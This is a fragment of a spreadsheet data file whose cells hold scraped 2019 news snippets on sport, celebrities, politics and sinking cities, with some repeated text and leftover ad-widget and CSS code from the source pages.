Africa and has defended her visceral attacks against Museveni and his family. In 2017, she told AFP that “so-called vulgar words are sometimes the best way to get your message across”. In her most recent post, she wrote a poem about her court case: “My presence in your court as a suspect and prisoner highlights multiple facets of dictatorship. I exposed the entrenchment of autocracy.” Earlier this year Uganda‘s Supreme Court upheld a decision to remove an age cap of 75 for presidential contenders, paving the way for Museveni – who has ruled since 1986 – to run again. Critics say Museveni is increasingly becoming intolerant of dissent as resistance to his rule grows. Source link</t>
  </si>
  <si>
    <t>Woods is captain of the 12-man American team and has confirmed he will do everything possible to become a rare playing skipper at Royal Melbourne.</t>
  </si>
  <si>
    <t>As news of the shooting broke, Blink-182 singer and bassist Mark Hoppus told his followers on Twitter that the rock band were on lockdown in their El Paso hotel. See full article at Film-news.co.uk » The post Julianne Moore and Aaron Paul lead tributes to El Paso shooting victims appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>MUNICH, GERMANY – AUGUST 16: Assistant coach Robert Kovac of FC Bayern Muenchen and Head coach Niko Kovac of FC Bayern Muenchen look on prior to the Bundesliga match between FC Bayern Muenchen and hertha-bsc at Allianz Arena on August 16, 2019 in Munich, Germany. (Photo by TF-Images/ Getty Images) /* custom css */ .td_uid_3_5d5b01d45c3c0_rand.td-a-rec-img { text-align: left; } .td_uid_3_5d5b01d45c3c0_rand.td-a-rec-img img { margin: 0 auto 0 0; } Bayern Munich kicked off the 2019/20 Bundesliga season on Friday, hosting Hertha Berlin at the Allianz Arena. Despite controlling the game throughout, the Bavarians succumbed to a disappointing 2-2 draw with their visitors. Niko Kovac and Co. have plenty to take away from the match. Bayern Munich’s lack of depth, however, was the issue most exposed by the side from Germany’s capital. Bayern Munich’s Lack of Depth Exposed Points Dropped Bayern Munich went into this game firm favourites to emerge with three points. Though Hertha Berlin have become a sort of bogey side for the Rekordmeister in recent seasons, Bayern’s quality should have been too much for the Berliners. And that was the case for the majority of the match. The Bavarians suffocated their opponents, forcing them deep into their own half. However, Hertha Berlin found a few opportunities to breathe and did well to take advantage of them. New signing Dodi Lukebakio converted a half-hearted counter-attack into a goal by way of a nasty deflection, before Marko Grujic doubled his side’s tally just two minutes later after beating a dazed Benjamin Pavard to a loose ball and cooly rounding the completely exposed Manuel Neuer. Yes, Bayern were unlucky to go down to goals of such fashion. Nevertheless, they only have themselves to blame for the disappointment of their draw. Die Roten had plenty of opportunities to put their opponents to the sword but could not take advantage of them. /* custom css */ .td_uid_2_5d5b01d45bab4_rand.td-a-rec-img { text-align: left; } .td_uid_2_5d5b01d45bab4_rand.td-a-rec-img img { margin: 0 auto 0 0; } Chances Wasted or Not Created As dismal as Bayern’s defending seemed it was their attack that truly disappointed. Some spectacular work from Serge Gnabry, easily the side’s best player on the day, and an unnecessary penalty awarded by VAR overshadowed the fact that Bayern struggled to create many significant chances against Hertha Berlin. Perhaps Kingsley Coman should have been awarded a penalty or two, but the Frenchman otherwise disappointed with his final ball. The 23-year-old has a bad habit of beating his man just to continue dribbling without ever making anything significant happen afterwards. With Thiago Alcantara – Bayern’s de facto source of creativity in the centre of the park – sequestered to defensive midfield, Bayern struggled to pick apart Berlin’s compact five-man backline. In most cases, a second-half substitute would come on to mend these issues. Such is Bayern Munich’s lack of depth, however, that Niko Kovac could not rely on that to solve his problem. With Leon Goretzka injured and new addition Ivan Perisic suspended, Kovac was forced to turn to youngsters Alphonso Davies and Renato Sanches. Davies and Sanches are good players in their own rights, but neither is much of a game-changer. Both players were brought on far too late to make much of a difference regardless. But Kovac’s choice to make his subs with only five minutes left in the match is not the problem. The issue most clearly exposed on Friday was Bayern Munich’s lack of depth that has come as a result of a quiet summer transfer window Bayern Munich’s Lack of Depth: Problem Solved? Shortly after the final whistle of Friday’s match, Bayern Munich confirmed the signings of Brazilian superstar Philippe Coutinho and 20-year-old French midfielder Mickael Cuisance. Whether these announcements were already planned or were simply made to appease the Bayern faithful is up for debate. One item that is not up for debate, however, is that both moves were ones the club needed to make. Coutinho will offer Kovac a fine alternative to Kingsley Coman on the left flank or another creative outlet in midfield. Against sides like Hertha Berlin who sit deep and compact, the 27-year-old’s creativity and passing range will be invaluable. Cuisance, meanwhile, might not have the same immediate impact as Coutinho, but he could still play an important role. Thiago Alcantara is too good going forward to play exclusively as a number six. Cuisance will provide Kovac another option at the position and could even develop into a player of real quality by the end of the season. Whether or not these additions will be enough to fix Bayern Munich’s lack of depth remains to be seen. At the very least, it is a step in the right direction from the Bavarians. But only time will tell if a lack of depth is the only problem plaguing the German giants or if the root of the issue lies much deeper. window.gie=window.gie||function(c){(gie.q=gie.q||[]).push(c)};gie(function(){gie.widgets.load({id:’jg-2IXwRQNxhTnI3cDxBNA’,sig:’KJ85AssqSkuj3DDJ1TVN9Vp3LnL93pPh5D-LSeqDV9Q=’,w:’594px’,h:’396px’,items:’1162054338′,caption: true ,tld:’co.uk’,is360: false })}); /* custom css */ .td_uid_4_5d5b01d45cb60_rand.td-a-rec-img { text-align: left; } .td_uid_4_5d5b01d45cb60_rand.td-a-rec-img img { margin: 0 auto 0 0; } (function(d) { var params = { id: “cbc3cb77-6304-47ce-ac06-e72a98f31c29”, d: “bGFzdHdvcmRvbmZvb3RiYWxsLmNvbQ==”, wid: “363076”, cb: (new Date()).getTime() }; var qs=[]; for(var key in params) qs.push(key+’=’+encodeURIComponent(params[key])); var s = d.createElement(‘script’);s.type=’text/javascript’;s.async=true; var p = ‘https:’ == document.location.protocol ? ‘https’ : ‘http’; s.src = p + “://api.content-ad.net/Scripts/widget2.aspx?” + qs.join(‘&amp;’); d.getElementById(“contentad363076”).appendChild(s); })(document); MUNICH, GERMANY – AUGUST 16: Assistant coach Robert Kovac of FC Bayern Muenchen and Head coach Niko Kovac of FC Bayern Muenchen look on prior to the Bundesliga match between FC Bayern Muenchen and hertha-bsc at Allianz Arena on August 16, 2019 in Munich, Germany. (Photo by TF-Images/ Getty Images) Bayern Munich kicked off the 2019/20 Bundesliga season on Friday, hosting Hertha Berlin at the Allianz Arena. Despite controlling the game throughout, the Bavarians succumbed to a disappointing 2-2 draw with their visitors. Niko Kovac and Co. have plenty to take away from the match. Bayern Munich’s lack of depth, however, was the issue most exposed by the side from Germany’s capital. Bayern Munich’s Lack of Depth Exposed Points Dropped Bayern Munich went into this game firm favourites to emerge with three points. Though Hertha Berlin have become a sort of bogey side for the Rekordmeister in recent seasons, Bayern’s quality should have been too much for the Berliners. And that was the case for the majority of the match. The Bavarians suffocated their opponents, forcing them deep into their own half. However, Hertha Berlin found a few opportunities to breathe and did well to take advantage of them. New signing Dodi Lukebakio converted a half-hearted counter-attack into a goal by way of a nasty deflection, before Marko Grujic doubled his side’s tally just two minutes later after beating a dazed Benjamin Pavard to a loose ball and cooly rounding the completely exposed Manuel Neuer. Yes, Bayern were unlucky to go down to goals of such fashion. Nevertheless, they only have themselves to blame for the disappointment of their draw. Die Roten had plenty of opportunities to put their opponents to the sword but could not take advantage of them. Chances Wasted or Not Created As dismal as Bayern’s defending seemed it was their attack that truly disappointed. Some spectacular work from Serge Gnabry, easily the side’s best player on the day, and an unnecessary penalty awarded by VAR overshadowed the fact that Bayern struggled to create many significant chances against Hertha Berlin. Perhaps Kingsley Coman should have been awarded a penalty or two, but the Frenchman otherwise disappointed with his final ball. The 23-year-old has a bad habit of beating his man just to continue dribbling without ever making anything significant happen afterwards. With Thiago Alcantara – Bayern’s de facto source of creativity in the centre of the park – sequestered to defensive midfield, Bayern struggled to pick apart Berlin’s compact five-man backline. In most cases, a second-half substitute would come on to mend these issues. Such is Bayern Munich’s lack of depth, however, that Niko Kovac could not rely on that to solve his problem. With Leon Goretzka injured and new addition Ivan Perisic suspended, Kovac was forced to turn to youngsters Alphonso Davies and Renato Sanches. Davies and Sanches are good players in their own rights, but neither is much of a game-changer. Both players were brought on far too late to make much of a difference regardless. But Kovac’s choice to make his subs with only five minutes left in the match is not the problem. The issue most clearly exposed on Friday was Bayern Munich’s lack of depth that has come as a result of a quiet summer transfer window Bayern Munich’s Lack of Depth: Problem Solved? Shortly after the final whistle of Friday’s match, Bayern Munich confirmed the signings of Brazilian superstar Philippe Coutinho and 20-year-old French midfielder Mickael Cuisance. Whether these announcements were already planned or were simply made to appease the Bayern faithful is up for debate. One item that is not up for debate, however, is that both moves were ones the club needed to make. Coutinho will offer Kovac a fine alternative to Kingsley Coman on the left flank or another creative outlet in midfield. Against sides like Hertha Berlin who sit deep and compact, the 27-year-old’s creativity and passing range will be invaluable. Cuisance, meanwhile, might not have the same immediate impact as Coutinho, but he could still play an important role. Thiago Alcantara is too good going forward to play exclusively as a number six. Cuisance will provide Kovac another option at the position and could even develop into a player of real quality by the end of the season. Whether or not these additions will be enough to fix Bayern Munich’s lack of depth remains to be seen. At the very least, it is a step in the right direction from the Bavarians. But only time will tell if a lack of depth is the only problem plaguing the German giants or if the root of the issue lies much deeper. This post MUNICH, GERMANY – AUGUST 16: Assistant coach Robert Kovac of FC Bayern Muenchen and Head coach Niko Kovac of FC Bayern Muenchen look on prior to the Bundesliga match between FC Bayern Muenchen and Hertha BSC at Allianz Arena on August 16, 2019 in Munich, Germany. (Photo by TF-Images/ Getty Images) /* custom css */ .td_uid_3_5d5b01d45c3c0_rand.td-a-rec-img { text-align: left; } .td_uid_3_5d5b01d45c3c0_rand.td-a-rec-img img { margin: 0 auto 0 0; } Bayern Munich kicked off the 2019/20 Bundesliga season on Friday, hosting Hertha Berlin at the Allianz Arena. Despite controlling the game throughout, the Bavarians succumbed to a disappointing 2-2 draw with their visitors. Niko Kovac and Co. have plenty to take away from the match. Bayern Munich’s lack of depth, however, was the issue most exposed by the side from Germany’s capital. Bayern Munich’s Lack of Depth Exposed Points Dropped Bayern Munich went into this game firm favourites to emerge with three points. Though Hertha Berlin have become a sort of bogey side for the Rekordmeister in recent seasons, Bayern’s quality should have been too much for the Berliners. And that was the case for the majority of the match. The Bavarians suffocated their opponents, forcing them deep into their own half. However, Hertha Berlin found a few opportunities to breathe and did well to take advantage of them. New signing Dodi Lukebakio converted a half-hearted counter-attack into a goal by way of a nasty deflection, before Marko Grujic doubled his side’s tally just two minutes later after beating a dazed Benjamin Pavard to a loose ball and cooly rounding the completely exposed Manuel Neuer. Yes, Bayern were unlucky to go down to goals of such fashion. Nevertheless, they only have themselves to blame for the disappointment of their draw. Die Roten had plenty of opportunities to put their opponents to the sword but could not take advantage of them. /* custom css */ .td_uid_2_5d5b01d45bab4_rand.td-a-rec-img { text-align: left; } .td_uid_2_5d5b01d45bab4_rand.td-a-rec-img img { margin: 0 auto 0 0; } Chances Wasted or Not Created As dismal as Bayern’s defending seemed it was their attack that truly disappointed. Some spectacular work from Serge Gnabry, easily the side’s best player on the day, and an unnecessary penalty awarded by VAR overshadowed the fact that Bayern struggled to create many significant chances against Hertha Berlin. Perhaps Kingsley Coman should have been awarded a penalty or two, but the Frenchman otherwise disappointed with his final ball. The 23-year-old has a bad habit of beating his man just to continue dribbling without ever making anything significant happen afterwards. With Thiago Alcantara – Bayern’s de facto source of creativity in the centre of the park – sequestered to defensive midfield, Bayern struggled to pick apart Berlin’s compact five-man backline. In most cases, a second-half substitute would come on to mend these issues. Such is Bayern Munich’s lack of depth, however, that Niko Kovac could not rely on that to solve his problem. With Leon Goretzka injured and new addition Ivan Perisic suspended, Kovac was forced to turn to youngsters Alphonso Davies and Renato Sanches. Davies and Sanches are good players in their own rights, but neither is much of a game-changer. Both players were brought on far too late to make much of a difference regardless. But Kovac’s choice to make his subs with only five minutes left in the match is not the problem. The issue most clearly exposed on Friday was Bayern Munich’s lack of depth that has come as a result of a quiet summer transfer window Bayern Munich’s Lack of Depth: Problem Solved? Shortly after the final whistle of Friday’s match, Bayern Munich confirmed the signings of Brazilian superstar Philippe Coutinho and 20-year-old French midfielder Mickael Cuisance. Whether these announcements were already planned or were simply made to appease the Bayern faithful is up for debate. One item that is not up for debate, however, is that both moves were ones the club needed to make. Coutinho will offer Kovac a fine alternative to Kingsley Coman on the left flank or another creative outlet in midfield. Against sides like Hertha Berlin who sit deep and compact, the 27-year-old’s creativity and passing range will be invaluable. Cuisance, meanwhile, might not have the same immediate impact as Coutinho, but he could still play an important role. Thiago Alcantara is too good going forward to play exclusively as a number six. Cuisance will provide Kovac another option at the position and could even develop into a player of real quality by the end of the season. Whether or not these additions will be enough to fix Bayern Munich’s lack of depth remains to be seen. At the very least, it is a step in the right direction from the Bavarians. But only time will tell if a lack of depth is the only problem plaguing the German giants or if the root of the issue lies much deeper. Main Photo Embed from Getty Imageswindow.gie=window.gie||function(c){(gie.q=gie.q||[]).push(c)};gie(function(){gie.widgets.load({id:’jg-2IXwRQNxhTnI3cDxBNA’,sig:’KJ85AssqSkuj3DDJ1TVN9Vp3LnL93pPh5D-LSeqDV9Q=’,w:’594px’,h:’396px’,items:’1162054338′,caption: true ,tld:’co.uk’,is360: false })}); /* custom css */ .td_uid_4_5d5b01d45cb60_rand.td-a-rec-img { text-align: left; } .td_uid_4_5d5b01d45cb60_rand.td-a-rec-img img { margin: 0 auto 0 0; } (function(d) { var params = { id: “cbc3cb77-6304-47ce-ac06-e72a98f31c29”, d: “bGFzdHdvcmRvbmZ...</t>
  </si>
  <si>
    <t>Some people stand apart, but not aloof.</t>
  </si>
  <si>
    <t>DERRY GIRLS season 2 is streaming on Netflix outside of the UK now. In episode 3, the Derry girls go to see Take That in Belfast but nearly don’t make the concert, thanks to a polar bear on the loose. Did a polar really escape Belfast Zoo? Here’s everything you need to know. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>She’s set to rake in millions, and has already begun living the high-life following her stint on Love Island. And on Friday evening, Molly-Mae Hague, 20, jetted into Ireland on a private jet to meet under-18s disco at Blazers nightclub in Longford, who were charged a minimum price of £18 to meet the reality star. It turns out that the her young fans in Longford were charged more than double the price which adults in Sudbury, Suffolk will pay to party with the Instagram star tonight, with earlybirds even able to secure the privilege for free. Jet-set: On Friday evening, Molly-Mae Hague, 20, jetted into Ireland on a private jet to meet under-18s disco at Blazers nightclub in Longford Keep it comfy in Molly-Mae’s Nasty Gal joggers Molly-Mae Hague has just spent the last eight weeks in the revolving Love Island ritual that is bikini during the day, bodycon dress at night. So we don’t blame her for channelling a more laid-back appearance when jetting off to yet another PA event. Throwing together Nasty Gal camel joggers and a sand-hued hoodie by PrettyLittleThing, Molly-Mae completed the look with a chunky Topshop boots. We’re loving this neutral colour palette, which is refreshing considering Molly-Mae normally rocks the neon shades. Plus it’ll work no matter the season, so her joggers are justifiable investment! Click the link to buy the exact pair, but hurry as they’re now on sale for only £10! Snap up her hoodie in the carousel below, where you’ll also find look-alike joggers from your favourite high-street brands such as Autograph and Missguided. * PRICES MAY NOT BE AS ADVERTISED …NOW GET ONE LIKE IT The minimum ticket price was £18 for youngsters to attend the under-18s bash with Molly-Mae, with prices rising for VIP packages which included the opportunity to snap selfies with the star. When compared to her upcoming appearance in Suffolk tonight, the prices seem pretty steep for Molly-Mae’s young Irish fans. Adults wanting to meet the Love Islander at Infinity Nightclub in Sudbury can get in for free before 11pm, while other tickets on sale currently ranging from £5 to £7. This means that youngsters attending Molly-Mae’s under-18s disco paid more than double the price of an adult tickets for a similar over-18s party. Kids’ party: Kids attending Blazers nightclub in Longford, Ireland were charged a minimum price of £18 to meet the reality star Oh dear! However, adults in Sudbury, Suffolk will pay a fraction of that amount to party with the Instagram star tonight (maximum £7), with earlybirds able to secure the privilege for free Yikes! It turns out that the her young fans in Longford were charged more than double the price which adults in Sudbury, Suffolk will pay to party with the Instagram star Expensive: When compared to her upcoming appearance in Suffolk tonight, the prices seem pretty steep for Molly-Mae’s young Irish fans And as Molly-Mae jetted to her first meet-and-greets with fans in Ireland on a private plane, she flaunted her lavish lifestyle on Instagram. She shared a snap of herself with a set of expensive Louis Vuitton luggage and added a video showing herself lounging aboard the SHY Aviation jet. When contacted by MailOnline, SHY Aviation refused to confirm whether or not Molly-Mae had paid for the flight, or if it had been gifted to her in return for a post on Instagram. MailOnline has contacted a representative for Molly-Mae, Insignia Nights for comment. Don’t look now: Youngsters attending Molly-Mae’s under-18s disco paid more than double the price of an adult tickets for a similar over-18s party Luxury life: Molly-Mae jetted to her first meet-and-greets with fans in Ireland aboard a private jet – and documented her journey on Instagram Of course! The reality star brought her beloved Ellie Belly stuffed toy with her Molly-Mae’s nightclub appearances come after she and boyfriend Tommy Fury, 20, gushed that they ‘are both so happy’ since leaving the villa, despite their surprise second place finish on the ITV2 reality show. The couple opened up on life in the real world during a TV interview on Friday’s This Morning, with Molly-Mae insisting ‘winning’ was not ‘even in her head’ when she appeared on the programme. She said: ‘It feels incredible. We’re both so happy right now we wouldn’t change a thing. It’s just been such an incredible journey.’ Branding Molly-Mae his ‘dream girl’, Tommy added: ‘As soon as I met Molly, I thought “I don’t care if I go tomorrow because I’ve met the girl of my dreams anyway”. Obviously it wasn’t really about winning – we’re winners in our own right.’ Loved-up: Molly-Mae’s nightclub appearances come after she and boyfriend Tommy Fury, 20, gushed that they ‘are both so happy’ since leaving the villa</t>
  </si>
  <si>
    <t>No work Orders to Report.</t>
  </si>
  <si>
    <t>She has been having a great time sitting in for Lorraine Kelly over the summer. And Christine Lampard put on yet another sensational style display as she was seen exiting ITV Studios on Thursday. Making the most of the sunshine, the presenter, 40, showed off her fabulous post-baby body in a striped dress as she enjoyed an ice-cream. Style savvy: Christine Lampard, 40, put on yet another sensational style display as she was seen exiting ITV Studios on Thursday Christine showed off her style credentials in the number which features hues of blue, peach, yellow and black. Falling at a stylish midi-length, she teamed the number with towering nude heels while strutting along. Christine sported a simple coat of make-up which showed off her features and complemented her flowing brunette tresses. Fun times: Making the most of the sunshine, the presenter, 40, showed off her fabulous post-baby body in a striped dress as she enjoyed an ice-cream Fashionista: Christine showed off her style credentials in the number which features hues of blue, peach, yellow and black Earn your stripes like Christine in a dress by Zara It’s safe to say Christine Lampard earned her style stripes when she stepped out in this stunning dress by Zara! Created in shades of emerald, black and nude, this design boasts a demure neckline, short puff sleeves and midi-length, offering an elegant nod to the 80s. As Christine shows, this dress beautifully pairs with nude heels, making it ideal for a fancy or formal occasion. So what are you waiting for? Click (right) to buy it while you can! It’s certain to be a sell-out. If you would rather shop around before opening your wallet, head straight to the carousel below. We have discovered striped dresses from AX Paris, Asos, Boden and Mary Katrantzou, which might just give this one a run for its money! * PRICES MAY NOT BE AS ADVERTISED …NOW GET ONE LIKE IT Walk this way: Falling at a stylish midi-length, she teamed the number with towering nude heels while strutting along Pretty: Christine sported a simple coat of make-up which showed off her features and complemented her flowing brunette tresses Last week, Christine discussed how her body has changed since welcoming her baby daughter Patricia a year ago with husband Frank. The TV presenter spoke to Fabulous about her figure and how her body has changed since giving birth – as she revealed she has put on a stone and gone up a shoe size. She said: ‘I’m wider all round [my waist and hips]. And I’ve gone up a shoe size since I had her! I could do more to try to trim myself back in, but I don’t care.’ ‘I’m enjoying her and I enjoy a glass of rosé. I mean come on, it’s the summer! I can’t say no to any of it.’ Motherhood: Last week, Christine discussed how her body has changed since welcoming her baby daughter Patricia a year ago with husband Frank Figure: The TV presenter spoke to Fabulous about her figure and how her body has changed since giving birth – as she revealed she has put on a stone and gone up a shoe size She said: ‘I’m wider all round [my waist and hips]. And I’ve gone up a shoe size since I had her! I could do more to try to trim myself back in, but I don’t care’ Suits her! Rochelle Humes also looked sensational in an oversized light brown suit with striped white detailing After years of being pressured to start a family, Christine hit back: ‘I didn’t give a s**t [about the pressure]. I just never got why it was a question. Whose business is it? And what difference does it make to anybody other than me? The television presenter had taken on the role of stepmother to Frank’s daughters Luna and Isla from his former relationship with Elen Rivas. Christine and Frank have gone from strength to strength as a married couple after they tied the knot in 2015. Looking good: She teamed it with a pair of white heels and a simple white top Loving life: Rochelle proved to be in high spirits as she exited her for the day</t>
  </si>
  <si>
    <t>Three contractors have admitted their entanglement in Perth's North Metropolitan Health Service fraud scandal.</t>
  </si>
  <si>
    <t>What happened overnight and what's ahead for the ASX.</t>
  </si>
  <si>
    <t>FROM the fireplaces to the tall ceilings to the attractive 1920s facade, this gracious New Town home offers that enticing old-world charm that so many homeowners love.</t>
  </si>
  <si>
    <t>America-bashing has always been the left’s favorite pastime.</t>
  </si>
  <si>
    <t>FS3 Kawasaki‘s Danny Buchan has taken his second win of the season after beating Josh Brookes in the opening Bennetts British Superbike race at Cadwell Park. Race one kicked off early Sunday afternoon in near-perfect conditions, after a short sharp shower, dampened the Mountain circuit just an hour before the race commenced. Buildbase Suzuki‘s Bradley Ray was set to start from his first front-row position in 2019, but his opening race of the day ended prematurely after his Suzuki GSX-R1000 broke down on the warm-up lap after suffering a fuel pump issue. From pole position, it was Josh Brookes who swept into the lead ahead of McAMS Yamaha‘s Jason O’Halloran and Danny Buchan. In the mid-pack, Josh Elliott was forced to take avoiding action across the grass at turn one after being forced wide by Gino Rea on the entry to Coppice. As the pack headed up the hill and into Park curve, Danny Buchan dived up the inside of O’Halloran and started his pursuit on PBM Ducati rider Josh Brookes. The leading duo had opened up a comfortable lead over O’Halloran who had Tommy Bridewell desperately looking for a way passed the Yamaha R1, and eventually made his way passed the Australian on the second lap. After a promising start for Dan Linfoot on the TAG Yamaha, his race ended three laps in after a low side at Mansfield, crashing out of sixth position. Once Bridewell had cleared O’Halloran, the Oxford Racing Ducati rider started his pursuit on the leading duo, setting the fastest lap of the race on lap seven. Soon the leading duo became three when Tommy Bridewell caught Brookes and Buchan as the leading two dropped the pace by a few tenths. Photo Credit: British Superbikes Meanwhile, a recovering Scott Redding managed to get the better of Peter Hickman at turn one, promoting the Gloucestershire rider into fifth position, behind Tyco BMW‘s Christian Iddon. On lap eleven, Buchan made his move, with a neat pass up the inside of Brookes into the difficult downhill left-hander of Mansfield and immediately opened a gap over the two V4 R Ducati’s. As we approached the closing stages of the opening race, the battle was still on for the lead after a mistake from Danny Buchan on the exit of the chicane on the run to the mountain, bunching the leading group back together, but just as he did once the Kawasaki rider hit the front, Buchan was able to re-open the gap at the front. Christian Iddon was holding fourth up until a small mistake on the penultimate lap gifted Redding and Hickman fourth and fifth positions. Danny Buchan held on to take his second win of the season ahead of Josh Brookes and Tommy Bridewell, whilst Redding took thirteen points for third, meaning his lead at the top of the standings was cut to thirteen points. Hickman came home in fifth ahead of Christian Iddon and Jason O’Halloran. Glenn Irwin came home in eighth position ahead of younger brother Andrew Irwin who took another point haul in order to protect his position in the showdown six, Ryan Vickers completed the top ten. Photo Credit: Tyco BMW Luke Stapleford came home ahead of Gino Rea, who took Bike Devil Seda Mv Agusta’s first points of the season, he was ahead of the injured Tarran Mackenzie, Xavi Fores and Dean Harrison took the final point. After the opening race of the day, Redding maintained his lead in the championship, but his teammate Josh Brookes cut the advantaged to thirteen points, whilst Tommy Bridewell sits in third a further twenty-six points back. Ahead of race two, the final two showdown positions were in danger, with Mackenzie, Honda Racing duo Andy Irwin, Fores, and Peter Hickman all within a race win’s gap. Courtesy of the fastest lap set in race one, Tommy Bridewell will line up on pole for the second race as he aims for his and Oxford Racing Ducati’s first win of the season.</t>
  </si>
  <si>
    <t>APOCALYPTIC asteroid strikes remain the preserve of science fiction, but an asteroid expert has now addressed the question of whether a rogue space rock really could wipe out life on Earth. The post Asteroid apocalypse: Expert reveals whether rogue space rock could destroy Earth appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>It dates from the reign of Emperor Yong Zheng nearly 300 years ago and sat gathering dust on a shelf. The post Chinese porcelain bowl nearly 300 years old fetches £220,000 appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Donald Trump denied ever pushing for the use of nuclear bombs against hurricanes, tweeting that the story was "just more FAKE NEWS!"</t>
  </si>
  <si>
    <t>How to Make Travel Matches – Automatic Match Life Hacks In this video you will see how to make electric travel matches at home. This project is for fun purpose. Things you need – Bottle Cap 9V Battery 9V Battery Connector Motor On/Off Switch Match Hot Glue Soldering Iron Scissor Music Name – Nice To […] The post How to Make easy Travel Matches – Match Life Hacks appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>A wildfire that started on Gran Canaria on Saturday, August 10, had spread across more than 3,700 acres and sparked evacuations in the area of Tejeda, the president of the Canary Islands government, Angel Victor Torres, said in a statement on Monday. On Monday, 11 helicopters and two planes assisted 300 firefighters in the battling against the fire, the statement said. This footage was shot in Tejeda that day, officials said. Local media reported that more than 1,000 residents were evacuated. Spanish media said a man who had been working with a welder in the area has been arrested by the Civil Guard on suspicion of starting the blaze. Credit: @112canarias via Storyful</t>
  </si>
  <si>
    <t>Antonio Rudiger injury latest: Chelsea defender impresses in comeback against Liverpool Original Source Antonio Rudiger has stepped up his recovery from injury after making his first appearance since April for Chelsea Under-23s against Liverpool on Monday evening. The German international defender had surgery on his left knee four months ago after suffering a meniscus injury that ended his season. But he looks set to hand Frank Lampard a timely defensive boost, as he gains more match fitness ahead of a possible recall against Norwich City at the weekend. The Blues have struggled at the back in his absence, losing 4-0 to Manchester United on the opening weekend, conceding two against Liverpool in the Super Cup and drawing 1-1 with Leicester. Here is his progress in recent weeks as it happened: Read More Pre-season Rudiger was not involved at all during pre-season, but the defender returned to full training at the beginning of August as part of stepping up his recovery. Lampard revealed at the time that the defender could be in contention for the visit of Leicester, however match fitness could be an issue when it came to selection for the game. Video Loading Video Unavailable Click to play Tap to play The video will start in 8Cancel Play now Named in the squad against Liverpool The 26-year-old was named on the bench in the Super Cup against Liverpool last week and told Chelsea TV after the draw with Leicester that he is taking things one step at a time. “I know I need to be patient. There is no need to rush anything because as we all know we have a long season to go. “I am happy because I am going to have some minutes with the Under-23s against Liverpool. I’m very pleased with that.” Read More Comeback against Liverpool (Image: Clive Howes – Chelsea FC/Chelsea FC via Getty Images) Rudiger started for the development squad against Liverpool at Stamford Bridge, along with Michy Batshuayi, and the defender provided the assist for the Belgian striker to open the scoring before half-time. The centre-back found Batshuayi over the top and the forward clipped a sublime finish past the keeper. Chelsea ended up 3-0 winners over the Reds, and Rudiger played the entire 90 minutes to hand the watching Frank Lampard encouragement ahead of the upcoming Premier League games. The Blues travel to newly promoted Norwich City on Saturday afternoon, with the Canaries impressing on their return to the top flight. And Rudiger may be needed to help contain Teemu Pukki, who hit a hat-trick against Newcastle at the weekend.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Antonio Rudiger injury latest: Chelsea defender impresses in comeback against Liverpool appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>England had one of its worst ever performances as it was bowled out for 67 on day two of the third Ashes Test in Leeds.</t>
  </si>
  <si>
    <t>The launch would be the fourth in recent weeks, as US and South Korea start military exercises. The post North Korea fires two more missiles, South says appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Click on to enlarge: Statement from Bureau of Prisons says Epstein was found unresponsive at 6:30 this morning from an apparent suicide. FBI is investigating. pic.twitter.com/LoaYaXZPjW — Pervaiz Shallwani (@Pervaizistan) August 10, 2019 Significant – Jail officials in statement say Epstein was in the Special Housing Unit at the MCC. This is important cause it […]</t>
  </si>
  <si>
    <t>Two years since a heart-wrenching split, Ian Kenny's feelings have found their way to Australian airwaves as Birds of Tokyo return with their first new music since 2016's Brace.</t>
  </si>
  <si>
    <t>Barack and Michelle Obama are close to buying a massive Martha’s Vineyard estate.</t>
  </si>
  <si>
    <t>KATE MIDDLETON, 37, is the Duchess of Cambridge and wife of Prince William, also 37. She is often admired for her tall and thin figure. What exercise does she use for her flat stomach and toned abs, and what diet does she eat? Daily Express :: Life and Style Feed</t>
  </si>
  <si>
    <t>Jakarta is one of the fastest sinking cities in the world, according to the World Economic Forum, due to rising sea levels and the over-extraction of groundwater. The Houston Chronicle reported that parts of Harris County, which contains Houston, have sunk between 10 and 12 feet since the 1920s, according to data from the US Geological Survey. Areas have continued to fall as much as 2 inches per year, an amount that can quickly add up. Lawmakers have tried to address the issue, creating a special purpose district meant to regulate the withdrawal of groundwater in 1975. But the problem has persisted, with privately owned wells and water suppliers continuing to pull from aquifers. Lagos The city of Lagos sits on the coast of Nigeria, constructed partly on the mainland, partly on some nearby islands. It’s also Africa’s most populous city. Its geography makes Lagos especially prone to flooding, and the coastline has already been eroding. As sea levels rise due to global warming, the city is increasingly at risk. One study from 2012 revealed that, because Nigeria’s coastline is so low, a sea level rise of just 1 to 3 meters “will have a catastrophic effect on the human activities in these regions.” A separate study this year found that global sea levels could rise more than two meters by the end of this century. New Orleans As recently as the 1930s, just a third of New Orleans was below sea level. When Katrina hit in 2005, that number went up to half. The city is vulnerable to rising sea levels because it was built on loose soil and was positioned so close to on the coast. Combined with its sinking — scientists have found it to be falling at a rate of 1 centimeter a year. Beijing A study from 2016 showed that Beijing is sinking by as much as 4 inches in some areas per year. Researchers said the cause of the sinking was depleting groundwater, similar to the situation in Jakarta and Houston. Beijing, which is not a coastal city, relies heavily on groundwater as its main source of water. The water has been accumulating over many years, but its extraction has dried up the soil and caused it to compact — leading to the sinking. Washington Washington is one of the most important cities in the US — and it’s also sinking. Research from 2015 showed that our country’s capital will drop more than 6 inches in the next 100 years. But unlike Jakarta, Washington’s sinking has nothing to do with aquifers or rising sea levels — it’s actually because of an ice sheet from the last ice age. A mile-high ice sheet pushed land beneath the Chesapeake Bay upward. When the ice sheet melted, thousands of years ago, the land settled back down. The researchers now believe that the area is gradually sinking, a process that could last thousands of years. But sea levels in the Chesapeake Bay are rising too, which could cause additional problems. Indonesia's capital city isn't the only one sinking The post Indonesia's capital city isn't the only one sinking appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>A week after the nasty incident at Lord's that left him concussed, Steve Smith was back with a bat in his hands at Headingley before day three of the third Test.</t>
  </si>
  <si>
    <t>Your guide to Perth’s metropolitan and regional display homes.</t>
  </si>
  <si>
